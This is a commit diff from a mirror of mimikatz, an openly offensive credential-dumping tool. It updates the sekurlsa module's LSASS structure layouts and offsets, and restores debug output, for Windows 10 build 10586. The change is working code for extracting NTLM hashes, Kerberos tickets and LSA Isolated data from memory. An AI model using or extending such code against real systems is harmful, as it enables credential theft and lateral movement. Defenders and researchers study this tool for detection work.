RepoMirrors
/
mimikatz
mirror of https://github.com/gentilkiwi/mimikatz
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

mimikatz & mimilib sekurlsa module ready for Windows 10 build 10586

This commit is contained in:
Benjamin DELPY 2015-11-13 00:47:56 +01:00
parent 71015c7081
commit 1b130574ed
5 changed files with 14 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
View File

@ -992,7 +992,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
kuhl_m_dpapi_oe_credential_add(sid, NULL, pPrimaryCreds10->isNtOwfPassword ? pPrimaryCreds10->NtOwfPassword : NULL, pPrimaryCreds10->isShaOwPassword ? pPrimaryCreds10->ShaOwPassword : NULL, NULL, NULL);
}
else
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0) + sizeof(USHORT)));
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)));
break;
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
@ -1164,7 +1164,7 @@ VOID kuhl_m_sekurlsa_genericLsaIsoOutput(PLSAISO_DATA_BLOB blob)
kprintf(L"\n\t * LSA Isolated Data: %.*S", blob->typeSize, blob->data);
kprintf(L"\n\t Unk-Key : "); kull_m_string_wprintf_hex(blob->unkKeyData, 3*16, 0);
kprintf(L"\n\t Encrypted: "); kull_m_string_wprintf_hex(blob->data + blob->typeSize, blob->origSize, 0);
//kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
//kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
//kull_m_string_wprintf_hex(blob->unkEmpty, 20, 0);
kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
kull_m_string_wprintf_hex(blob->unkData2, sizeof(blob->unkData2), 0); kprintf(L", 5:0x%x", blob->unk5);
}

3
mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h
View File

@ -183,7 +183,8 @@ typedef struct _LSAISO_DATA_BLOB {
DWORD unk3;
DWORD unk4;
BYTE unkKeyData[3*16];
BYTE unkEmpty[20];
BYTE unkData2[16];
DWORD unk5;
DWORD origSize;
BYTE data[ANYSIZE_ARRAY];
} LSAISO_DATA_BLOB, *PLSAISO_DATA_BLOB;

2
mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h
View File

@ -401,6 +401,8 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_6 {
LSA_UNICODE_STRING Description;
LSA_UNICODE_STRING AltTargetDomainName;
LSA_UNICODE_STRING KDCServer; //?
DWORD unk10586_d;
PVOID unk10586_p;
PKERB_EXTERNAL_NAME ClientName;
PVOID name0;
ULONG TicketFlags;

3
mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h
View File

@ -470,7 +470,8 @@ typedef struct _LSAISO_DATA_BLOB {
DWORD unk3;
DWORD unk4;
BYTE unkKeyData[3*16];
BYTE unkEmpty[20];
BYTE unkData2[16];
DWORD unk5;
DWORD origSize;
BYTE data[ANYSIZE_ARRAY];
} LSAISO_DATA_BLOB, *PLSAISO_DATA_BLOB;

8
mimilib/sekurlsadbg/kwindbg.c
View File

@ -294,7 +294,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
}
}
else
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0) + sizeof(USHORT)));
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)));
break;
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
@ -453,9 +453,9 @@ VOID kuhl_m_sekurlsa_genericLsaIsoOutput(PLSAISO_DATA_BLOB blob)
dprintf("\n\t * LSA Isolated Data: %.*s", blob->typeSize, blob->data);
dprintf("\n\t Unk-Key : "); kull_m_string_dprintf_hex(blob->unkKeyData, 3*16, 0);
dprintf("\n\t Encrypted: "); kull_m_string_dprintf_hex(blob->data + blob->typeSize, blob->origSize, 0);
//kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
//kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
//kull_m_string_wprintf_hex(blob->unkEmpty, 20, 0);
dprintf("\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize);
dprintf("\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4);
kull_m_string_dprintf_hex(blob->unkData2, sizeof(blob->unkData2), 0); dprintf(", 5:0x%x", blob->unk5);
}
void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, LPCSTR prefix)